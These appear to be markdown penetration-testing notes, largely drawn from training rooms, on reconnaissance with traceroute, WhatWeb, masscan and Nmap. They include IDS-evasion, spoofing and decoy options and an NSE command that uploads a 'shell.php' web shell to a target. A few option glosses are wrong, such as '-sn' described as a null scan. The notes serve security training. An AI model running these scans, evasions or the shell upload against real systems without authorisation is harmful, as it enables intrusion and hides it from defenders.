1 ec2-3-248-240-5.eu-west-1.compute.amazonaws.com (3.248.240.5) 2.663 ms * ec2-3-248-240-13.eu-west-1.compute.amazonaws.com (3.248.240.13) 7.468 ms
2 100.66.8.86 (100.66.8.86) 43.231 ms 100.65.21.64 (100.65.21.64) 18.886 ms 100.65.22.160 (100.65.22.160) 14.556 ms
3 * 100.66.16.176 (100.66.16.176) 8.006 ms *
4 100.66.11.34 (100.66.11.34) 17.401 ms 100.66.10.14 (100.66.10.14) 23.614 ms 100.66.19.236 (100.66.19.236) 17.524 ms
5 100.66.7.35 (100.66.7.35) 12.808 ms 100.66.6.109 (100.66.6.109) 14.791 ms *
6 100.65.14.131 (100.65.14.131) 1.026 ms 100.66.5.189 (100.66.5.189) 19.246 ms 100.66.5.243 (100.66.5.243) 19.805 ms
7 100.65.13.143 (100.65.13.143) 14.254 ms 100.95.18.131 (100.95.18.131) 0.944 ms 100.95.18.129 (100.95.18.129) 0.778 ms
8 100.95.2.143 (100.95.2.143) 0.680 ms 100.100.4.46 (100.100.4.46) 1.392 ms 100.95.18.143 (100.95.18.143) 0.878 ms
9 100.100.20.76 (100.100.20.76) 7.819 ms 100.92.11.36 (100.92.11.36) 18.669 ms 100.100.20.26 (100.100.20.26) 0.842 ms
10 100.92.11.112 (100.92.11.112) 17.852 ms * 100.92.11.158 (100.92.11.158) 16.687 ms
11 100.92.211.82 (100.92.211.82) 19.713 ms 100.92.0.126 (100.92.0.126) 18.603 ms 52.93.112.182 (52.93.112.182) 17.738 ms
12 99.83.69.207 (99.83.69.207) 17.603 ms 15.827 ms 17.351 ms
13 100.92.9.83 (100.92.9.83) 17.894 ms 100.92.79.136 (100.92.79.136) 21.250 ms 100.92.9.118 (100.92.9.118) 18.166 ms
14 172.67.69.208 (172.67.69.208) 17.976 ms 16.945 ms 100.92.9.3 (100.92.9.3) 17.709 ms
```
In the traceroute output above, we have 14 numbered lines; each line represents one router/hop. Our system sends three packets with TTL set to 1, then three packets with TTL set to 2, and so forth. Depending on the network topology, we might get replies from up to 3 different routers, depending on the route taken by the packet. Consider line number 12, the twelfth router with the listed IP address has dropped the packet three times and sent an ICMP time exceeded in-transit message. The line `12 99.83.69.207 (99.83.69.207) 17.603 ms 15.827 ms 17.351 ms` shows the time in milliseconds for each reply to reach our system.
On the other hand, we can see that we received only a single reply on the third line. The two stars in the output `3 * 100.66.16.176 (100.66.16.176) 8.006 ms *` indicate that our system didnt receive two expected ICMP time exceeded in-transit messages.
Finally, in the first line of the output, we can see that the packets leaving the AttackBox take different routes. We can see two routers that responded to TTL being one. Our system never received the third expected ICMP message.
Traceroute B
AttackBox Terminal - Traceroute B
```shell-session
user@AttackBox$ traceroute tryhackme.com
traceroute to tryhackme.com (104.26.11.229), 30 hops max, 60 byte packets
1 ec2-79-125-1-9.eu-west-1.compute.amazonaws.com (79.125.1.9) 1.475 ms * ec2-3-248-240-31.eu-west-1.compute.amazonaws.com (3.248.240.31) 9.456 ms
2 100.65.20.160 (100.65.20.160) 16.575 ms 100.66.8.226 (100.66.8.226) 23.241 ms 100.65.23.192 (100.65.23.192) 22.267 ms
3 100.66.16.50 (100.66.16.50) 2.777 ms 100.66.11.34 (100.66.11.34) 22.288 ms 100.66.16.28 (100.66.16.28) 4.421 ms
4 100.66.6.47 (100.66.6.47) 17.264 ms 100.66.7.161 (100.66.7.161) 39.562 ms 100.66.10.198 (100.66.10.198) 15.958 ms
5 100.66.5.123 (100.66.5.123) 20.099 ms 100.66.7.239 (100.66.7.239) 19.253 ms 100.66.5.59 (100.66.5.59) 15.397 ms
6 * 100.66.5.223 (100.66.5.223) 16.172 ms 100.65.15.135 (100.65.15.135) 0.424 ms
7 100.65.12.135 (100.65.12.135) 0.390 ms 100.65.12.15 (100.65.12.15) 1.045 ms 100.65.14.15 (100.65.14.15) 1.036 ms
8 100.100.4.16 (100.100.4.16) 0.482 ms 100.100.20.122 (100.100.20.122) 0.795 ms 100.95.2.143 (100.95.2.143) 0.827 ms
9 100.100.20.86 (100.100.20.86) 0.442 ms 100.100.4.78 (100.100.4.78) 0.347 ms 100.100.20.20 (100.100.20.20) 1.388 ms
10 100.92.212.20 (100.92.212.20) 11.611 ms 100.92.11.54 (100.92.11.54) 12.675 ms 100.92.11.56 (100.92.11.56) 10.835 ms
11 100.92.6.52 (100.92.6.52) 11.427 ms 100.92.6.50 (100.92.6.50) 11.033 ms 100.92.210.50 (100.92.210.50) 10.551 ms
12 100.92.210.139 (100.92.210.139) 10.026 ms 100.92.6.13 (100.92.6.13) 14.586 ms 100.92.210.69 (100.92.210.69) 12.032 ms
13 100.92.79.12 (100.92.79.12) 12.011 ms 100.92.79.68 (100.92.79.68) 11.318 ms 100.92.80.84 (100.92.80.84) 10.496 ms
14 100.92.9.27 (100.92.9.27) 11.354 ms 100.92.80.31 (100.92.80.31) 13.000 ms 52.93.135.125 (52.93.135.125) 11.412 ms
15 150.222.241.85 (150.222.241.85) 9.660 ms 52.93.135.81 (52.93.135.81) 10.941 ms 150.222.241.87 (150.222.241.87) 16.543 ms
16 100.92.228.102 (100.92.228.102) 15.168 ms 100.92.227.41 (100.92.227.41) 10.134 ms 100.92.227.52 (100.92.227.52) 11.756 ms
17 100.92.232.111 (100.92.232.111) 10.589 ms 100.92.231.69 (100.92.231.69) 16.664 ms 100.92.232.37 (100.92.232.37) 13.089 ms
18 100.91.205.140 (100.91.205.140) 11.551 ms 100.91.201.62 (100.91.201.62) 10.246 ms 100.91.201.36 (100.91.201.36) 11.368 ms
19 100.91.205.79 (100.91.205.79) 11.112 ms 100.91.205.83 (100.91.205.83) 11.040 ms 100.91.205.33 (100.91.205.33) 10.114 ms
20 100.91.211.45 (100.91.211.45) 9.486 ms 100.91.211.79 (100.91.211.79) 13.693 ms 100.91.211.47 (100.91.211.47) 13.619 ms
21 100.100.6.81 (100.100.6.81) 11.522 ms 100.100.68.70 (100.100.68.70) 10.181 ms 100.100.6.21 (100.100.6.21) 11.687 ms
22 100.100.65.131 (100.100.65.131) 10.371 ms 100.100.92.6 (100.100.92.6) 10.939 ms 100.100.65.70 (100.100.65.70) 23.703 ms
23 100.100.2.74 (100.100.2.74) 15.317 ms 100.100.66.17 (100.100.66.17) 11.492 ms 100.100.88.67 (100.100.88.67) 35.312 ms
24 100.100.16.16 (100.100.16.16) 19.155 ms 100.100.16.28 (100.100.16.28) 19.147 ms 100.100.2.68 (100.100.2.68) 13.718 ms
25 99.83.89.19 (99.83.89.19) 28.929 ms * 21.790 ms
26 104.26.11.229 (104.26.11.229) 11.070 ms 11.058 ms 11.982 ms
```
In the second run of the traceroute program, we noticed that the packets took a longer route this time, passing through 26 routers. If you are running a traceroute to a system within your network, the route will be unlikely to change. However, we cannot expect the route to remain fixed when the packets need to go via other routers outside our network.
To summarize, we can notice the following:
- The number of hops/routers between your system and the target system depends on the time you are running traceroute. There is no guarantee that your packets will always follow the same route, even if you are on the same network or you repeat the traceroute command within a short time.
- Some routers return a public IP address. You might examine a few of these routers based on the scope of the intended penetration testing.
- Some routers dont return a reply.

View file

@ -0,0 +1,32 @@
## What is WhatWeb?
WhatWeb is an open-source tool used for fingerprinting web technologies utilized by a website. It analyzes the HTTP headers, HTML content, and other aspects of a web page to identify the software and frameworks being used, such as CMS platforms, server types, JavaScript libraries, and more.
## Common Use and Commands:
WhatWeb is commonly used by security professionals and web developers to gather information about a target website's technology stack. To utilize WhatWeb, follow these steps:
```Terminal
whatweb [OPTIONS] TARGET_URL
```
Common options include:
- `-v`: Verbose mode, providing more detailed output.
- `-a`: Aggressive mode, increasing the intensity of detection.
- `-i`: Ignore IP addresses in URLs.
- `-l`: Limit requests to a specific URL or directory.
Example:
```Terminal
whatweb -v example.com
```
Output may include:
- Detected CMS platforms (e.g., WordPress, Joomla).
- Server information (e.g., Apache, Nginx).
- JavaScript libraries and frameworks.
- Security headers and configurations.
## More Information:
For additional details on WhatWeb and its usage, users can refer to the tool's documentation or visit the official website. Additionally, the source code for WhatWeb is available on GitHub: [https://github.com/urbanadventurer/WhatWeb](https://github.com/urbanadventurer/WhatWeb).

View file

@ -0,0 +1,53 @@
## Start with passive reconnaissance
Gather as much information as possible about the target system using passive methods, such as DNS queries, ping, and WHOIS lookups. This will help you identify potential targets, hosts, and other useful information about the system. Some tools that you can use include:
- DNS: Use tools like `dig`, `dnsdumper`, `nslookup`, `shodan`, and SSL/TLS certificates to gather information about the target's DNS records, SSL/TLS certificates, and other network-related information.
- Ping: Use the `ping` command to identify the IP address of the target system and its time-to-live (TTL) value, which can help you identify the type of operating system and network architecture in use.
- WHOIS: Use the `whois` command to gather information about the domain name, such as registration details, owner information, and contact details.
## Active Reconnaissance
Once you have gathered enough information about the target system, you can move on to active reconnaissance. This involves using tools that actively scan the target network to identify vulnerabilities and potential entry points. Some tools that you can use include:
- AMASS: This tool is used to discover subdomains and gather information about them. You can use it to search for DNS records, IP addresses, and other network-related information.
- Netcat: This tool is used to create TCP/UDP connections between two hosts, and can be used to test for open ports, perform banner grabbing, and other tasks.
- Telnet: This tool is used to connect to remote hosts and execute commands on them. It can be used to test for open ports, brute force passwords, and other tasks.
- Traceroute: This tool is used to trace the path that network packets take from the source to the destination. It can be used to identify routers, firewalls, and other network devices in the path.
## Put it all together
Once you have gathered all the information you need using both passive and active reconnaissance, you can use this information to plan your attack. Use the information you have gathered to identify potential vulnerabilities, entry points, and other weaknesses in the system. You can then use this information to launch targeted attacks and gain access to the system.
<h2>Global Steps</h2>
Whois Records
```
whois DOMAIN
```
NameServer (From Whois Record) ---> Manual Way
```
dig +short @NAME-SERVER A DOMAIN
dig +short @NAME-SERVER MX DOMAIN
dig +short @NAME-SERVER ... DOMAIN
```
NameServer Enumeration (From Whois Record) ---> Automated Way
```
sudo nmap --dns-servers NAME-SERVER(Without @) --script dns-brute --script-args dns-brute.domain=DOMAIN
```
- Possible to add a specific wordlist
Osint Enumeration
```
# Osint Enumeration
AMASS
DNSdumper
crt.sh
...
```

View file

@ -0,0 +1,26 @@
## What is Mass Scan?
Mass Scan is an open-source tool used for network scanning and port discovery. It is designed to quickly scan large networks for open ports and services, and generate reports on the identified vulnerabilities.
Mass Scan works by sending packets to the target network and analyzing the responses to determine which ports are open and which services are running. It supports both TCP and UDP protocols and can scan large networks with high speed and accuracy.
## Common Use and Commands:
Mass Scan is commonly used by network administrators and security professionals to identify potential vulnerabilities in their networks and secure them from potential threats.
The following are some common commands used in Mass Scan:
```
- masscan <target-ip> -p <port> ---> Scan a single IP address
- masscan <target-ip-range> -p <port> ---> Scan a range of IP addresses
- masscan <subnet> -p <port> ---> Scan a subnet
- masscan <target-ip> -p 1-65535 ---> Scan all ports on a target
- masscan <target-ip> --exclude-ports <port1,port2,...> ---> Exclude certain ports from scan
- masscan <target-ip> -p <port> --rate=1000(ex) ---> Set rate to make it scan faster
- masscan <target-ip> -p <port> --randomize-hosts ---> Randomise host (spoof request)
- masscan <target-ip>/8 -p <port> ---> Will scan all computers on network
```
Mass Scan supports various options and flags that can be used to customize the scan, such as setting the rate of packets per second, specifying the output format, and enabling OS detection.
---
## More Information
For more information on Mass Scan, including the latest updates and documentation, please visit the project's official website: https://github.com/robertdavidgraham/masscan

View file

@ -0,0 +1,63 @@
## What is Nmap?
Nmap (Network Mapper) is a popular open-source tool used for network exploration and security auditing. It is designed to scan large networks and identify potential vulnerabilities and security risks.
Nmap works by sending packets to target hosts and analyzing the responses to determine which ports are open, which services are running, and which operating systems are being used. It can also perform various advanced scans, such as OS detection, version detection, and service fingerprinting.
## Common Use and Commands:
Nmap is commonly used by security professionals, system administrators, and penetration testers to scan networks and identify potential vulnerabilities and security issues.
The following are some common commands used in Nmap:
Usual Commands
```
#First Scan
nmap -ip
#Second Scan (Normal)
nmap -sC -sV -A IP -p (PORT FOUND) --min-rate=9856
#Second Scan (Hidding)
nmap -sC -sV -A -f IP -p (PORT FOUND) --min-rate=9856 --data-length 25
```
Additional Commands
```
-sT ---> TCP
-sU ---> UDP
-sC ---> Scan Script (Run default script)
-sV ---> Find port version
-sS --->
-sA ---> Check Firewall filter
-iL ---> Scan from list.txt IP
-O ---> OS Dectection
-A ---> Enable OS detection, version detection...
-D RND:NUMBER ---> Create X diff IP adresse that will scan (ex: 10 different host)
-sn ---> Send null package (HIDING)
-Pn ---> Dont ping
-f ---> Fragment parkets (Try to be undetectable)
--min-rate=9856 ---> Send packets at the rate of 9956 per second
--data-length 25 ---> add garbage data to packets (Avoid IPS/IDS signature)
--spoof-mac ---> Try to spoof address (Work localy)
--source-port X ---> Change the source port for scanning (spoof source port)
-oN, -oG, -oX ---> Export Format
/24 ---> Check all 10.0.1.HERE
/16 ---> Check all 10.0.HERE.HERE
```
- Options
- Timing ---> T0-T5 (0=Paranoid and 5=Insane Fast)
- Parelel ---> Use --source-port 80 (Will act like http request)
- Random Scanning ---> Use nmap IP/24 --randomize-hosts
- MAC Adress Spoofing ---> Nmap IP --spoof-mac (X)
- Send Bad Checksums ---> Nmap IP --badsum
Nmap supports various options and flags that can be used to customize the scan and generate detailed reports, such as setting the output format, enabling verbose logging, and excluding certain hosts or ports.
## More Information
For more information on Nmap, including the latest updates and documentation, please visit the project's official website: https://nmap.org/

View file

@ -0,0 +1,401 @@
## Type of Scan
- TCP Scan
To understand TCP Connect scans (`-sT`), it's important that you're comfortable with the _TCP three-way handshake_. If this term is new to you then completing [Introductory Networking](https://tryhackme.com/room/introtonetworking) before continuing would be advisable.
As a brief recap, the three-way handshake consists of three stages. First the connecting terminal (our attacking machine, in this instance) sends a TCP request to the target server with the SYN flag set. The server then acknowledges this packet with a TCP response containing the SYN flag, as well as the ACK flag. Finally, our terminal completes the handshake by sending a TCP request with the ACK flag set.
![](https://muirlandoracle.co.uk/wp-content/uploads/2020/03/image-2.png)
![](https://i.imgur.com/ngzBWID.png)
This is one of the fundamental principles of TCP/IP networking, but how does it relate to Nmap?
Well, as the name suggests, a TCP Connect scan works by performing the three-way handshake with each target port in turn. In other words, Nmap tries to connect to each specified TCP port, and determines whether the service is open by the response it receives.
#### SYN Scan
As with TCP scans, SYN scans (`-sS`) are used to scan the TCP port-range of a target or targets; however, the two scan types work slightly differently. SYN scans are sometimes referred to as "_Half-open"_ scans, or _"Stealth"_ scans.
Where TCP scans perform a full three-way handshake with the target, SYN scans sends back a RST TCP packet after receiving a SYN/ACK from the server (this prevents the server from repeatedly trying to make the request). In other words, the sequence for scanning an **open** port looks like this:
![](https://i.imgur.com/cPzF0kU.png)
![](https://i.imgur.com/bcgeZmI.png)
This has a variety of advantages for us as hackers:
- It can be used to bypass older Intrusion Detection systems as they are looking out for a full three way handshake. This is often no longer the case with modern IDS solutions; it is for this reason that SYN scans are still frequently referred to as "stealth" scans.
- SYN scans are often not logged by applications listening on open ports, as standard practice is to log a connection once it's been fully established. Again, this plays into the idea of SYN scans being stealthy.
- Without having to bother about completing (and disconnecting from) a three-way handshake for every port, SYN scans are significantly faster than a standard TCP Connect scan.
There are, however, a couple of disadvantages to SYN scans, namely:
- They require sudo permissions[1] in order to work correctly in Linux. This is because SYN scans require the ability to create raw packets (as opposed to the full TCP handshake), which is a privilege only the root user has by default.
- Unstable services are sometimes brought down by SYN scans, which could prove problematic if a client has provided a production environment for the test.
All in all, the pros outweigh the cons.
For this reason, SYN scans are the default scans used by Nmap _if run with sudo permissions_. If run **without** sudo permissions, Nmap defaults to the TCP Connect scan we saw in the previous task.
#### UDP Scan
Unlike TCP, UDP connections are _stateless_. This means that, rather than initiating a connection with a back-and-forth "handshake", UDP connections rely on sending packets to a target port and essentially hoping that they make it. This makes UDP superb for connections which rely on speed over quality (e.g. video sharing), but the lack of acknowledgement makes UDP significantly more difficult (and much slower) to scan. The switch for an Nmap UDP scan is (`-sU`)
When a packet is sent to an open UDP port, there should be no response. When this happens, Nmap refers to the port as being `open|filtered`. In other words, it suspects that the port is open, but it could be firewalled. If it gets a UDP response (which is very unusual), then the port is marked as _open_. More commonly there is no response, in which case the request is sent a second time as a double-check. If there is still no response then the port is marked _open|filtered_ and Nmap moves on.
When a packet is sent to a _closed_ UDP port, the target should respond with an ICMP (ping) packet containing a message that the port is unreachable. This clearly identifies closed ports, which Nmap marks as such and moves on.
- NULL, FIN, Xmas
- NULL
The null scan does not set any flag; all six flag bits are set to zero. You can choose this scan using the `-sN` option. A TCP packet with no flags set will not trigger any response when it reaches an open port, as shown in the figure below. Therefore, from Nmaps perspective, a lack of reply in a null scan indicates that either the port is open or a firewall is blocking the packet.
![](https://tryhackme-images.s3.amazonaws.com/user-uploads/5f04259cf9bf5b57aed2c476/room-content/04b178a9cf7048c21256988b8b2343e3.png)
However, we expect the target server to respond with an RST packet if the port is closed. Consequently, we can use the lack of RST response to figure out the ports that are not closed: open or filtered.
![](https://tryhackme-images.s3.amazonaws.com/user-uploads/5f04259cf9bf5b57aed2c476/room-content/224e01a913a1ce7b0fb2b9290ff5e1c8.png)
Below is an example of a null scan against a Linux server. The null scan we carried out has successfully identified the six open ports on the target system. Because the null scan relies on the lack of a response to infer that the port is not closed, it cannot indicate with certainty that these ports are open; there is a possibility that the ports are not responding due to a firewall rule.
Pentester Terminal
```shell-session
pentester@TryHackMe$ sudo nmap -sN 10.10.254.161
Starting Nmap 7.60 ( https://nmap.org ) at 2021-08-30 10:30 BST
Nmap scan report for 10.10.254.161
Host is up (0.00066s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
22/tcp open|filtered ssh
25/tcp open|filtered smtp
80/tcp open|filtered http
110/tcp open|filtered pop3
111/tcp open|filtered rpcbind
143/tcp open|filtered imap
MAC Address: 02:45:BF:8A:2D:6B (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 96.50 seconds
```
Note that many Nmap options require root privileges. Unless you are running Nmap as root, you need to use `sudo` as in the example above using the `-sN` option.
#### FIN Scan
The FIN scan sends a TCP packet with the FIN flag set. You can choose this scan type using the `-sF` option. Similarly, no response will be sent if the TCP port is open. Again, Nmap cannot be sure if the port is open or if a firewall is blocking the traffic related to this TCP port.
![](https://tryhackme-images.s3.amazonaws.com/user-uploads/5f04259cf9bf5b57aed2c476/room-content/78eb3d6ba158542f2b3223184b032e64.png)
However, the target system should respond with an RST if the port is closed. Consequently, we will be able to know which ports are closed and use this knowledge to infer the ports that are open or filtered. It's worth noting some firewalls will 'silently' drop the traffic without sending an RST.
![](https://tryhackme-images.s3.amazonaws.com/user-uploads/5f04259cf9bf5b57aed2c476/room-content/74dc07da7351a5a7f258948ec59efccc.png)
Below is an example of a FIN scan against a Linux server. The result is quite similar to the result we obtained earlier using a null scan.
Pentester Terminal
```shell-session
pentester@TryHackMe$ sudo nmap -sF 10.10.254.161
Starting Nmap 7.60 ( https://nmap.org ) at 2021-08-30 10:32 BST
Nmap scan report for 10.10.254.161
Host is up (0.0018s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
22/tcp open|filtered ssh
25/tcp open|filtered smtp
80/tcp open|filtered http
110/tcp open|filtered pop3
111/tcp open|filtered rpcbind
143/tcp open|filtered imap
MAC Address: 02:45:BF:8A:2D:6B (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 96.52 seconds
```
#### Xmas Scan
The Xmas scan gets its name after Christmas tree lights. An Xmas scan sets the FIN, PSH, and URG flags simultaneously. You can select Xmas scan with the option `-sX`.
Like the Null scan and FIN scan, if an RST packet is received, it means that the port is closed. Otherwise, it will be reported as open|filtered.
The following two figures show the case when the TCP port is open and the case when the TCP port is closed.
![](https://tryhackme-images.s3.amazonaws.com/user-uploads/5f04259cf9bf5b57aed2c476/room-content/7d28b756aed3b6eb72faf98d6974776c.png)
![](https://tryhackme-images.s3.amazonaws.com/user-uploads/5f04259cf9bf5b57aed2c476/room-content/4304eacbc3db1af21657f285bc16ebce.png)
The console output below shows an example of a Xmas scan against a Linux server. The obtained results are pretty similar to that of the null scan and the FIN scan.
Pentester Terminal
```shell-session
pentester@TryHackMe$ sudo nmap -sX 10.10.254.161
Starting Nmap 7.60 ( https://nmap.org ) at 2021-08-30 10:34 BST
Nmap scan report for 10.10.254.161
Host is up (0.00087s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
22/tcp open|filtered ssh
25/tcp open|filtered smtp
80/tcp open|filtered http
110/tcp open|filtered pop3
111/tcp open|filtered rpcbind
143/tcp open|filtered imap
MAC Address: 02:45:BF:8A:2D:6B (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 84.85 seconds
```
On scenario where these three scan types can be efficient is when scanning a target behind a stateless (non-stateful) firewall. A stateless firewall will check if the incoming packet has the SYN flag set to detect a connection attempt. Using a flag combination that does not match the SYN packet makes it possible to deceive the firewall and reach the system behind it. However, a stateful firewall will practically block all such crafted packets and render this kind of scan useless.
#### ICMP Scan
On first connection to a target network in a black box assignment, our first objective is to obtain a "map" of the network structure -- or, in other words, we want to see which IP addresses contain active hosts, and which do not.
One way to do this is by using Nmap to perform a so called "ping sweep". This is exactly as the name suggests: Nmap sends an ICMP packet to each possible IP address for the specified network. When it receives a response, it marks the IP address that responded as being alive. For reasons we'll see in a later task, this is not always accurate; however, it can provide something of a baseline and thus is worth covering.
To perform a ping sweep, we use the `-sn` switch in conjunction with IP ranges which can be specified with either a hypen (`-`) or CIDR notation. i.e. we could scan the `192.168.0.x` network using:
- `nmap -sn 192.168.0.1-254`
or
- `nmap -sn 192.168.0.0/24`
The `-sn` switch tells Nmap not to scan any ports -- forcing it to rely primarily on ICMP echo packets (or ARP requests on a local network, if run with sudo or directly as the root user) to identify targets. In addition to the ICMP echo requests, the `-sn` switch will also cause nmap to send a TCP SYN packet to port 443 of the target, as well as a TCP ACK (or TCP SYN if not run as root) packet to port 80 of the target.
On first connection to a target network in a black box assignment, our first objective is to obtain a "map" of the network structure -- or, in other words, we want to see which IP addresses contain active hosts, and which do not.
One way to do this is by using Nmap to perform a so called "ping sweep". This is exactly as the name suggests: Nmap sends an ICMP packet to each possible IP address for the specified network. When it receives a response, it marks the IP address that responded as being alive. For reasons we'll see in a later task, this is not always accurate; however, it can provide something of a baseline and thus is worth covering.
To perform a ping sweep, we use the `-sn` switch in conjunction with IP ranges which can be specified with either a hypen (`-`) or CIDR notation. i.e. we could scan the `192.168.0.x` network using:
- `nmap -sn 192.168.0.1-254`
or
- `nmap -sn 192.168.0.0/24`
example: netmask 255.255.0.0 ---> NUMBER.NUMBER.0.0/16
example: netmask 255.255.255.0 ---> Number.Number.Number.0/24
The `-sn` switch tells Nmap not to scan any ports -- forcing it to rely primarily on ICMP echo packets (or ARP requests on a local network, if run with sudo or directly as the root user) to identify targets. In addition to the ICMP echo requests, the `-sn` switch will also cause nmap to send a TCP SYN packet to port 443 of the target, as well as a TCP ACK (or TCP SYN if not run as root) packet to port 80 of the target.
#### Maimon Scan
Uriel Maimon first described this scan in 1996. In this scan, the FIN and ACK bits are set. The target should send an RST packet as a response. However, certain BSD-derived systems drop the packet if it is an open port exposing the open ports. This scan wont work on most targets encountered in modern networks; however, we include it in this room to better understand the port scanning mechanism and the hacking mindset. To select this scan type, use the `-sM` option.
Most target systems respond with an RST packet regardless of whether the TCP port is open. In such a case, we wont be able to discover the open ports. The figure below shows the expected behaviour in the cases of both open and closed TCP ports.
![](https://tryhackme-images.s3.amazonaws.com/user-uploads/5f04259cf9bf5b57aed2c476/room-content/8ca5e5e0f6e0a1843cebe11b5b0785b3.png)
The console output below is an example of a TCP Maimon scan against a Linux server. As mentioned, because open ports and closed ports are behaving the same way, the Maimon scan could not discover any open ports on the target system.
Pentester Terminal
```shell-session
pentester@TryHackMe$ sudo nmap -sM 10.10.252.27
Starting Nmap 7.60 ( https://nmap.org ) at 2021-08-30 10:36 BST
Nmap scan report for ip-10-10-252-27.eu-west-1.compute.internal (10.10.252.27)
Host is up (0.00095s latency).
All 1000 scanned ports on ip-10-10-252-27.eu-west-1.compute.internal (10.10.252.27) are closed
MAC Address: 02:45:BF:8A:2D:6B (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 1.61 seconds
```
This type of scan is not the first scan one would pick to discover a system; however, it is important to know about it as you dont know when it could come in handy.
## NSE Scripts
The **N**map **S**cripting **E**ngine (NSE) is an incredibly powerful addition to Nmap, extending its functionality quite considerably. NSE Scripts are written in the _Lua_ programming language, and can be used to do a variety of things: from scanning for vulnerabilities, to automating exploits for them. The NSE is particularly useful for reconnaisance, however, it is well worth bearing in mind how extensive the script library is.
There are many categories available. Some useful categories include:
- `safe`:- Won't affect the target
- `intrusive`:- Not safe: likely to affect the target
- `vuln`:- Scan for vulnerabilities
- `exploit`:- Attempt to exploit a vulnerability
- `auth`:- Attempt to bypass authentication for running services (e.g. Log into an FTP server anonymously)
- `brute`:- Attempt to bruteforce credentials for running services
- `discovery`:- Attempt to query running services for further information about the network (e.g. query an SNMP server).
A more exhaustive list can be found [here](https://nmap.org/book/nse-usage.html).
In the next task we'll look at how to interact with the NSE and make use of the scripts in these categories.
In Task 3 we looked very briefly at the `--script` switch for activating NSE scripts from the `vuln` category using `--script=vuln`. It should come as no surprise that the other categories work in exactly the same way. If the command `--script=safe` is run, then any applicable safe scripts will be run against the target (Note: only scripts which target an active service will be activated).
To run a specific script, we would use `--script=<script-name>` , e.g. `--script=http-fileupload-exploiter`.
Multiple scripts can be run simultaneously in this fashion by separating them by a comma. For example: `--script=smb-enum-users,smb-enum-shares`.
Some scripts require arguments (for example, credentials, if they're exploiting an authenticated vulnerability). These can be given with the `--script-args` Nmap switch. An example of this would be with the `http-put` script (used to upload files using the PUT method). This takes two arguments: the URL to upload the file to, and the file's location on disk.  For example:
`nmap -p 80 --script http-put --script-args http-put.url='/dav/shell.php',http-put.file='./shell.php'`
Note that the arguments are separated by commas, and connected to the corresponding script with periods (i.e.  `<script-name>.<argument>`).
A full list of scripts and their corresponding arguments (along with example use cases) can be found [here](https://nmap.org/nsedoc/).
Nmap scripts come with built-in help menus, which can be accessed using `nmap --script-help <script-name>`. This tends not to be as extensive as in the link given above, however, it can still be useful when working locally.
Ok, so we know how to use the scripts in Nmap, but we don't yet know how to _find_ these scripts.
We have two options for this, which should ideally be used in conjunction with each other. The first is the page on the [Nmap website](https://nmap.org/nsedoc/) (mentioned in the previous task) which contains a list of all official scripts. The second is the local storage on your attacking machine. Nmap stores its scripts on Linux at `/usr/share/nmap/scripts`. All of the NSE scripts are stored in this directory by default -- this is where Nmap looks for scripts when you specify them.
There are two ways to search for installed scripts. One is by using the `/usr/share/nmap/scripts/script.db` file. Despite the extension, this isn't actually a database so much as a formatted text file containing filenames and categories for each available script.
![](https://i.imgur.com/aJdVSAP.png)
Nmap uses this file to keep track of (and utilise) scripts for the scripting engine; however, we can also _grep_ through it to look for scripts. For example: `grep "ftp" /usr/share/nmap/scripts/script.db`.
![](https://i.imgur.com/ijAhZsy.png)
The second way to search for scripts is quite simply to use the `ls` command. For example, we could get the same results as in the previous screenshot by using `ls -l /usr/share/nmap/scripts/*ftp*`:
![](https://i.imgur.com/7GV9Wzi.png)
_Note the use of asterisks_ (`*`) _on either side of the search term_
The same techniques can also be used to search for categories of script. For example:
`grep "safe" /usr/share/nmap/scripts/script.db`
![](https://i.imgur.com/352GgTj.png)
_Installing New Scripts_
We mentioned previously that the Nmap website contains a list of scripts, so, what happens if one of these is missing in the `scripts` directory locally? A standard `sudo apt update && sudo apt install nmap` should fix this; however, it's also possible to install the scripts manually by downloading the script from Nmap (`sudo wget -O /usr/share/nmap/scripts/<script-name>.nse https://svn.nmap.org/nmap/scripts/<script-name>.nse`). This must then be followed up with `nmap --script-updatedb`, which updates the `script.db` file to contain the newly downloaded script.
It's worth noting that you would require the same "updatedb" command if you were to make your own NSE script and add it into Nmap -- a more than manageable task with some basic knowledge of Lua!
## Spoofing and Decoys
In some network setups, you will be able to scan a target system using a spoofed IP address and even a spoofed MAC address. Such a scan is only beneficial in a situation where you can guarantee to capture the response. If you try to scan a target from some random network using a spoofed IP address, chances are you wont have any response routed to you, and the scan results could be unreliable.
The following figure shows the attacker launching the command `nmap -S SPOOFED_IP 10.10.254.161`. Consequently, Nmap will craft all the packets using the provided source IP address `SPOOFED_IP`. The target machine will respond to the incoming packets sending the replies to the destination IP address `SPOOFED_IP`. For this scan to work and give accurate results, the attacker needs to monitor the network traffic to analyze the replies.
![](https://tryhackme-images.s3.amazonaws.com/user-uploads/5f04259cf9bf5b57aed2c476/room-content/45b982d501fd26deb2b381059b16f80c.png)
In brief, scanning with a spoofed IP address is three steps:
1. Attacker sends a packet with a spoofed source IP address to the target machine.
2. Target machine replies to the spoofed IP address as the destination.
3. Attacker captures the replies to figure out open ports.
In general, you expect to specify the network interface using `-e` and to explicitly disable ping scan `-Pn`. Therefore, instead of `nmap -S SPOOFED_IP 10.10.254.161`, you will need to issue `nmap -e NET_INTERFACE -Pn -S SPOOFED_IP 10.10.254.161` to tell Nmap explicitly which network interface to use and not to expect to receive a ping reply. It is worth repeating that this scan will be useless if the attacker system cannot monitor the network for responses.
When you are on the same subnet as the target machine, you would be able to spoof your MAC address as well. You can specify the source MAC address using `--spoof-mac SPOOFED_MAC`. This address spoofing is only possible if the attacker and the target machine are on the same Ethernet (802.3) network or same WiFi (802.11).
Spoofing only works in a minimal number of cases where certain conditions are met. Therefore, the attacker might resort to using decoys to make it more challenging to be pinpointed. The concept is simple, make the scan appears to be coming from many IP addresses so that the attackers IP address would be lost among them. As we see in the figure below, the scan of the target machine will appear to be coming from 3 different sources, and consequently, the replies will go the decoys as well.
![](https://tryhackme-images.s3.amazonaws.com/user-uploads/5f04259cf9bf5b57aed2c476/room-content/754fc455556a424ca83f512665beaf7d.png)
